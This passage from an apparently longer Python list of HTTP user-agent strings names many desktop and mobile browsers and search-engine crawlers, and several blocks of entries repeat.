'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
